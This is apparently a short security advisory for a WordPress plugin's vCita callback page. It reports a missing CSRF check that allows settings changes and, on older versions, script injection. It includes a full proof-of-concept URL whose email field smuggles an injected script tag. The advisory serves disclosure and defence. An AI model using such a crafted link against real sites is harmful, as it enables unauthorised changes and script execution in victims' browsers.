The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to change the plugin’s settings, and on older versions (<= 4.9.1), inject arbitrary web-scripts, by tricking a logged in user with the contributor role or higher to click a link.
https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>